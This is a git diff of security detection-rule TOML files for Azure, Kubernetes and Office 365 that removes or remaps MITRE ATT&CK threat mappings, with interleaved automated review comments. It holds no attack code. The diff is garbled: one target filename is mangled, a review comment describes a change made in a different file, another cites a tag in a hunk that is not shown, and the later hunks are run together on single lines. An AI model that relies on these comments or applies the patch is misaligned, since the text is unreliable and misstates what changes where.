+++ b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml
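Review bot: The first hunk of this file adds an empty line inside the `tags` array just before the closing `]`; it is whitespace noise rather than a tag and should be dropped, and the same stray blank line is added to the `tags` arrays of initial_access_entra_id_first_time_seen_device_code_auth.toml, initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml, initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml and persistence_entra_id_user_signed_in_from_unusual_device.toml in this patch. Separately, the second hunk deletes the Privilege Escalation (TA0004) threat entry while the only tactic tag visible in the first hunk is `"Tactic: Credential Access"`; if a `"Tactic: Privilege Escalation"` tag exists above the visible lines it is now orphaned and should be removed. The same orphan-tag check applies to every other rule in this patch whose `[[rule.threat]]` entries are removed (for example persistence_automation_account_created.toml, persistence_event_hub_created_or_updated.toml and the kubernetes rules), since none of those hunks touch the `tags` arrays.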
@@ -97,16 +97,3 @@ reference = "https://attack.mitre.org/techniques/T1222/"
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1537"
-name = "Transfer Data to Cloud Account"
-reference = "https://attack.mitre.org/techniques/T1537/"
-
-
-[rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
-
diff --git a/rules/integrations/azure/impact_resources_resource_group_deletion.toml b/rules/integrations/azure/impact_resources_resource_group_deletion.toml
index a28f3b45431..cc81e8e2578 100644
--- a/rules/integrations/azure/impact_resources_resource_group_deletion.toml
+++ b/rules/integrations/azure/impact_resources_resource_group_de_deletion.toml
@@ -80,6 +80,21 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF
[[rule.threat]]
framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1529"
+name = "System Shutdown/Reboot"
+reference = "https://attack.mitre.org/techniques/T1529/"
+
+[[rule.threat.technique]]
+id = "T1490"
+name = "Inhibit System Recovery"
+reference = "https://attack.mitre.org/techniques/T1490/"
+
+[[rule.threat.technique]]
+id = "T1489"
+name = "Service Stop"
+reference = "https://attack.mitre.org/techniques/T1489/"
+
[[rule.threat.technique]]
id = "T1485"
name = "Data Destruction"
@@ -90,21 +105,3 @@ reference = "https://attack.mitre.org/techniques/T1485/"
id = "TA0040"
name = "Impact"
reference = "https://attack.mitre.org/tactics/TA0040/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1562"
-name = "Impair Defenses"
-reference = "https://attack.mitre.org/techniques/T1562/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
-
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml b/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml
index 43a2a424aa0..901507c48a5 100644
--- a/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml
+++ b/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml
@@ -78,6 +78,7 @@ tags = [
"Use Case: Identity and Access Audit",
"Tactic: Initial Access",
"Resources: Investigation Guide",
+
]
timestamp_override = "event.ingested"
type = "new_terms"
@@ -137,14 +138,19 @@ reference = "https://attack.mitre.org/tactics/TA0001/"
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1528"
-name = "Steal Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1528/"
+id = "T1550"
+name = "Use Alternate Authentication Material"
+reference = "https://attack.mitre.org/techniques/T1550/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1550.001"
+name = "Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1550/001/"
[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
[rule.new_terms]
field = "new_terms_fields"
value = ["azure.signinlogs.properties.user_principal_name"]
diff --git a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml
index dd13f3c1aa0..d521704f143 100644
--- a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml
+++ b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml
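Review bot: This hunk re-maps the second threat entry from T1528 / Credential Access (TA0006) to T1550.001 / Defense Evasion (TA0005), but the tags hunk of the same file only shows `"Tactic: Initial Access"` in view; if the `tags` array still carries `"Tactic: Credential Access"` it is now orphaned, and a `"Tactic: Defense Evasion"` tag is needed for the new tactic. Replacing the former with `"Tactic: Defense Evasion",` keeps tags and `rule.threat` in step. The enclosing `[[rule.threat]]` table header starts above this hunk.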
@@ -102,36 +102,16 @@ id = "T1566.002"
name = "Spearphishing Link"
reference = "https://attack.mitre.org/techniques/T1566/002/"
+[[rule.threat.technique]]
+id = "T1199"
+name = "Trusted Relationship"
+reference = "https://attack.mitre.org/techniques/T1199/"
+
[rule.threat.tactic]
id = "TA0001"
name = "Initial Access"
reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1528"
-name = "Steal Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1528/"
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
[rule.investigation_fields]
field_names = [
"@timestamp",
diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml
index 7e5c8cc7b8f..2c633fc8965 100644
--- a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml
+++ b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml
@@ -75,6 +75,7 @@ tags = [
"Tactic: Initial Access",
"Tactic: Credential Access",
"Resources: Investigation Guide",
+
]
timestamp_override = "event.ingested"
type = "new_terms"
@@ -160,6 +161,11 @@ id = "T1566.002"
name = "Spearphishing Link"
reference = "https://attack.mitre.org/techniques/T1566/002/"
+[[rule.threat.technique]]
+id = "T1199"
+name = "Trusted Relationship"
+reference = "https://attack.mitre.org/techniques/T1199/"
+
[rule.threat.tactic]
id = "TA0001"
name = "Initial Access"
diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml
index b8869e67cbe..e5ddf8e989b 100644
--- a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml
+++ b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml
@@ -74,6 +74,7 @@ tags = [
"Use Case: Identity and Access Audit",
"Resources: Investigation Guide",
"Tactic: Initial Access",
+
]
timestamp_override = "event.ingested"
type = "query"
@@ -160,6 +161,11 @@ id = "T1566.002"
name = "Spearphishing Link"
reference = "https://attack.mitre.org/techniques/T1566/002/"
+[[rule.threat.technique]]
+id = "T1199"
+name = "Trusted Relationship"
+reference = "https://attack.mitre.org/techniques/T1199/"
+
[rule.threat.tactic]
id = "TA0001"
name = "Initial Access"
diff --git a/rules/integrations/azure/persistence_automation_account_created.toml b/rules/integrations/azure/persistence_automation_account_created.toml
index a349b7481c8..ce9b522545d 100644
--- a/rules/integrations/azure/persistence_automation_account_created.toml
+++ b/rules/integrations/azure/persistence_automation_account_created.toml
@@ -88,16 +88,3 @@ reference = "https://attack.mitre.org/techniques/T1078/004/"
id = "TA0003"
name = "Persistence"
reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1651"
-name = "Cloud Administration Command"
-reference = "https://attack.mitre.org/techniques/T1651/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml
index d9fa2d2aa9f..f26e6c6a39d 100644
--- a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml
+++ b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml
@@ -67,6 +67,7 @@ tags = [
"Data Source: Microsoft Entra ID",
"Data Source: Microsoft Entra ID Sign-in Logs",
"Resources: Investigation Guide",
+
]
timestamp_override = "event.ingested"
type = "new_terms"
@@ -118,23 +119,6 @@ id = "TA0001"
name = "Initial Access"
reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
[rule.investigation_fields]
field_names = [
"azure.signinlogs.properties.user_principal_name",
diff --git a/rules/integrations/azure/persistence_event_hub_created_or_updated.toml b/rules/integrations/azure/persistence_event_hub_created_or_updated.toml
index 8752c55c138..fc8d63fc48a 100644
--- a/rules/integrations/azure/persistence_event_hub_created_or_updated.toml
+++ b/rules/integrations/azure/persistence_event_hub_created_or_updated.toml
@@ -111,21 +111,3 @@ reference = "https://attack.mitre.org/techniques/T1552/005/"
id = "TA0006"
name = "Credential Access"
reference = "https://attack.mitre.org/tactics/TA0006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1098.003"
-name = "Additional Cloud Roles"
-reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml
index 2afce3c35ea..d2956e2aa07 100644
--- a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml
+++ b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml
@@ -98,41 +98,6 @@ id = "TA0007"
name = "Discovery"
reference = "https://attack.mitre.org/tactics/TA0007/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1550.001"
-name = "Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1550/001/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1550.001"
-name = "Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1550/001/"
-
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
[rule.new_terms]
field = "new_terms_fields"
value = ["user_agent.original"]
diff --git a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml
index 46cf1eb9e04..3d7530a10c0 100644
--- a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml
+++ b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml
@@ -79,18 +79,3 @@ id = "TA0002"
name = "Execution"
reference = "https://attack.mitre.org/tactics/TA0002/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml b/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml
index 792d42d750c..1ac77ed6803 100644
--- a/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml
+++ b/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml
@@ -103,18 +103,6 @@ id = "TA0001"
name = "Initial Access"
reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
[rule.new_terms]
field = "new_terms_fields"
value = ["user_agent.original"]
diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml
index 00cfc028b8d..abd158abb57 100644
--- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml
+++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml
@@ -122,16 +122,3 @@ reference = "https://attack.mitre.org/techniques/T1610/"
id = "TA0002"
name = "Execution"
reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1610"
-name = "Deploy Container"
-reference = "https://attack.mitre.org/techniques/T1610/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml
index 00b34f2cfe3..dad214db728 100644
--- a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml
+++ b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml
@@ -120,16 +120,3 @@ reference = "https://attack.mitre.org/techniques/T1610/"
id = "TA0002"
name = "Execution"
reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1610"
-name = "Deploy Container"
-reference = "https://attack.mitre.org/techniques/T1610/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml
index 44a7da15684..a2d144b306f 100644
--- a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml
+++ b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml
@@ -36,16 +36,16 @@ This rule detects when a user grants or broadens high-risk permissions in a Role ### False positive analysis -- A platform engineer performing an urgent, legitimate RBAC adjustment (e.g., expanding a Role/ClusterRole for a new feature rollout) and then immediately patching or deploying a DaemonSet/Deployment/CronJob as part of the same change window can match this sequence. +- A platform engineer performing an urgent, legitimate RBAC adjustment (e.g., expanding a Role/ClusterRole for a new feature rollout) and then immediately patching or deploying a DaemonSet/Deployment/CronJob as part of the same change window can match this sequence. - A CI/CD pipeline or GitOps-style workflow using a non-system:masters identity may update RBAC manifests and then apply workload updates within minutes during routine releases, producing this pattern without malicious intent. ### Response and remediation -- Immediately revoke or roll back the risky Role/ClusterRole changes and remove any new/updated RoleBinding/ClusterRoleBinding that ties the elevated permissions to the triggering user or service account. -- Quarantine the modified Deployment/DaemonSet/CronJob by scaling it to zero or deleting it and cordon/drain affected nodes if pods ran privileged, used hostPath mounts, or executed on many nodes. -- Rotate credentials and access paths exposed through the workload (service account tokens, kubeconfig files, mounted secrets, cloud keys) and invalidate any newly issued tokens tied to the actor. -- For eradication and recovery, redeploy workloads from trusted Git/registry sources, block the suspicious images/digests in admission controls, and verify no persistence remains via CronJobs, DaemonSets, webhook configurations, or additional RBAC bindings. 
-- Escalate to incident response and platform leadership if the RBAC change included wildcard permissions or escalation verbs, if the workload ran privileged/hostNetwork/hostPID, or if sensitive secrets were accessed or exfiltration is suspected. +- Immediately revoke or roll back the risky Role/ClusterRole changes and remove any new/updated RoleBinding/ClusterRoleBinding that ties the elevated permissions to the triggering user or service account. +- Quarantine the modified Deployment/DaemonSet/CronJob by scaling it to zero or deleting it and cordon/drain affected nodes if pods ran privileged, used hostPath mounts, or executed on many nodes. +- Rotate credentials and access paths exposed through the workload (service account tokens, kubeconfig files, mounted secrets, cloud keys) and invalidate any newly issued tokens tied to the actor. +- For eradication and recovery, redeploy workloads from trusted Git/registry sources, block the suspicious images/digests in admission controls, and verify no persistence remains via CronJobs, DaemonSets, webhook configurations, or additional RBAC bindings. +- Escalate to incident response and platform leadership if the RBAC change included wildcard permissions or escalation verbs, if the workload ran privileged/hostNetwork/hostPID, or if sensitive secrets were accessed or exfiltration is suspected. - Harden by enforcing least-privilege RBAC, requiring peer approval for RBAC changes, restricting workload mutations via GitOps-only service accounts, and using admission policies to deny privileged pods, hostPath mounts, and unapproved registries. """ references = [ 
@@ -114,16 +114,3 @@ reference = "https://attack.mitre.org/techniques/T1098/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml index 5db31548fc8..e1ff2f63e1d 100644 --- a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml +++ b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml 
@@ -26,24 +26,24 @@ This rule detects allowed create or patch activity against sensitive Kubernetes ### Possible investigation steps -- Retrieve the full audit event for the change and compare it to the most recent prior modification of the same workload to identify what was altered (e.g., image, command/args, env/secret refs, volumes, serviceAccount, securityContext, hostPath/hostNetwork, privileged settings). -- Attribute the action to a real identity by tracing the Kubernetes user to its backing cloud/IAM identity or kubeconfig/cert and validate whether the access path (SSO, token, service account, CI/CD runner) and source network location are expected for that operator. -- Determine blast radius by listing other recent creates/patches by the same identity and from the same origin across namespaces, and check for follow-on actions such as creating RBAC bindings, secrets, or additional controllers. -- Inspect the affected workload’s rollout status and pod specs to confirm whether new pods were created, then review container images, pull registries, and runtime behavior for indicators of compromise (unexpected network egress, crypto-mining, credential access, or exec activity). +- Retrieve the full audit event for the change and compare it to the most recent prior modification of the same workload to identify what was altered (e.g., image, command/args, env/secret refs, volumes, serviceAccount, securityContext, hostPath/hostNetwork, privileged settings). +- Attribute the action to a real identity by tracing the Kubernetes user to its backing cloud/IAM identity or kubeconfig/cert and validate whether the access path (SSO, token, service account, CI/CD runner) and source network location are expected for that operator. +- Determine blast radius by listing other recent creates/patches by the same identity and from the same origin across namespaces, and check for follow-on actions such as creating RBAC bindings, secrets, or additional controllers. 
+- Inspect the affected workload’s rollout status and pod specs to confirm whether new pods were created, then review container images, pull registries, and runtime behavior for indicators of compromise (unexpected network egress, crypto-mining, credential access, or exec activity). - Validate the change against an approved deployment workflow by correlating with GitOps/CI commit history and change tickets, and if unapproved, contain by scaling down/rolling back the workload and revoking the credential or token used. ### False positive analysis -- A legitimate on-call engineer performs an emergency `kubectl` create/patch to a Deployment/CronJob/DaemonSet from a new workstation, VPN egress IP, or updated kubectl version, producing an unusual user_agent/source IP/username combination despite being authorized. +- A legitimate on-call engineer performs an emergency `kubectl` create/patch to a Deployment/CronJob/DaemonSet from a new workstation, VPN egress IP, or updated kubectl version, producing an unusual user_agent/source IP/username combination despite being authorized. - A routine automation path changes (e.g., CI runner or service account rotated/migrated to a new node pool or network segment) and continues applying standard workload updates, causing the same create/patch activity to appear anomalous due to the new origin and client identity. ### Response and remediation -- Immediately pause impact by scaling the modified Deployment/CronJob to zero or deleting the new DaemonSet and stopping any active rollout while preserving the altered manifest for evidence. -- Roll back the workload to the last known-good version from GitOps/CI or prior ReplicaSet/Job template, then redeploy only after verifying container images, init containers, commands, serviceAccount, and privileged/host settings match the approved baseline. 
-- Revoke and rotate the credential used for the change (user token/cert or service account token), invalidate related kubeconfigs, and review/remove any newly created RBAC bindings, secrets, or service accounts tied to the same actor. -- Quarantine affected nodes and pods for analysis by cordoning/draining nodes that ran the new pods and collecting pod logs, container filesystem snapshots, and network egress details to identify payloads and persistence. -- Escalate to the incident response/on-call security team immediately if the change introduced privileged containers, hostPath mounts, hostNetwork, new external images/registries, or any unexpected DaemonSet creation across multiple nodes. +- Immediately pause impact by scaling the modified Deployment/CronJob to zero or deleting the new DaemonSet and stopping any active rollout while preserving the altered manifest for evidence. +- Roll back the workload to the last known-good version from GitOps/CI or prior ReplicaSet/Job template, then redeploy only after verifying container images, init containers, commands, serviceAccount, and privileged/host settings match the approved baseline. +- Revoke and rotate the credential used for the change (user token/cert or service account token), invalidate related kubeconfigs, and review/remove any newly created RBAC bindings, secrets, or service accounts tied to the same actor. +- Quarantine affected nodes and pods for analysis by cordoning/draining nodes that ran the new pods and collecting pod logs, container filesystem snapshots, and network egress details to identify payloads and persistence. +- Escalate to the incident response/on-call security team immediately if the change introduced privileged containers, hostPath mounts, hostNetwork, new external images/registries, or any unexpected DaemonSet creation across multiple nodes. 
- Harden by enforcing admission controls to restrict privileged settings and sensitive namespaces, requiring changes via approved automation identities, and tightening RBAC so only designated deployment controllers can create/patch DaemonSets, Deployments, and CronJobs. """ references = [ @@ -107,18 +107,6 @@ id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original", "source.ip", "kubernetes.audit.user.username"] diff --git a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml index dd96a8d835c..f869cc079a1 100644 --- a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml +++ b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml 
@@ -35,16 +35,16 @@ This rule detects Kubernetes service accounts performing allowed write actions o ### False positive analysis -- A platform automation running in-cluster (e.g., a controller or CI job using a service account) legitimately applies RBAC manifests during routine deployment, upgrades, or namespace onboarding, resulting in create/patch/update of Roles or RoleBindings. +- A platform automation running in-cluster (e.g., a controller or CI job using a service account) legitimately applies RBAC manifests during routine deployment, upgrades, or namespace onboarding, resulting in create/patch/update of Roles or RoleBindings. - A Kubernetes operator or housekeeping workflow running under a service account intentionally adjusts RBAC as part of maintenance (e.g., rotating access, reconciling drift, or cleaning up obsolete bindings) and triggers allowed delete or update actions on RBAC resources. ### Response and remediation -- Immediately remove or quarantine the offending service account by deleting its RoleBindings/ClusterRoleBindings and restarting or scaling down the owning workload to stop further RBAC writes. -- Revert the unauthorized RBAC object changes by restoring the last known-good Roles/Bindings from GitOps/manifests (or `kubectl rollout undo` where applicable) and verify no new subjects gained wildcard or cluster-admin-equivalent access. -- Rotate credentials by recreating the service account or triggering token re-issuance, deleting any mounted legacy token secrets, and redeploying workloads to ensure old tokens cannot be reused. -- Hunt and eradicate persistence by searching for additional recently modified RBAC objects and newly created service accounts in the same namespaces, then remove unauthorized accounts/bindings and scan the implicated container images for backdoors. 
-- Escalate to incident response and cluster administrators immediately if any change grants `cluster-admin`, introduces `*` verbs/resources, or binds a service account to privileged ClusterRoles across namespaces. +- Immediately remove or quarantine the offending service account by deleting its RoleBindings/ClusterRoleBindings and restarting or scaling down the owning workload to stop further RBAC writes. +- Revert the unauthorized RBAC object changes by restoring the last known-good Roles/Bindings from GitOps/manifests (or `kubectl rollout undo` where applicable) and verify no new subjects gained wildcard or cluster-admin-equivalent access. +- Rotate credentials by recreating the service account or triggering token re-issuance, deleting any mounted legacy token secrets, and redeploying workloads to ensure old tokens cannot be reused. +- Hunt and eradicate persistence by searching for additional recently modified RBAC objects and newly created service accounts in the same namespaces, then remove unauthorized accounts/bindings and scan the implicated container images for backdoors. +- Escalate to incident response and cluster administrators immediately if any change grants `cluster-admin`, introduces `*` verbs/resources, or binds a service account to privileged ClusterRoles across namespaces. - Harden going forward by enforcing least-privilege RBAC, enabling admission controls to restrict RBAC modifications to approved identities/namespaces, and using short-lived projected service account tokens with workload identity constraints. """ references = [ @@ -111,15 +111,3 @@ id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" 
diff --git a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml index fe4db96ec06..22016d9160b 100644 --- a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml +++ b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml @@ -108,15 +108,3 @@ id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/o365/collection_exchange_mailbox_access_by_unusual_client_app_id.toml b/rules/integrations/o365/collection_exchange_mailbox_access_by_unusual_client_app_id.toml index 4883340158d..3b6bdd9ca93 100644 --- a/rules/integrations/o365/collection_exchange_mailbox_access_by_unusual_client_app_id.toml +++ b/rules/integrations/o365/collection_exchange_mailbox_access_by_unusual_client_app_id.toml @@ -185,23 +185,6 @@ id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["o365.audit.ClientAppId"] 
diff --git a/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml b/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml index a7b3d02a970..7f28c7920d8 100644 --- a/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml +++ b/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml @@ -58,6 +58,7 @@ tags = [ "Use Case: Identity and Access Audit", "Tactic: Credential Access", "Resources: Investigation Guide", + ] timestamp_override = "event.ingested" type = "eql" @@ -121,21 +122,3 @@ reference = "https://attack.mitre.org/techniques/T1566/002/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml b/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml index 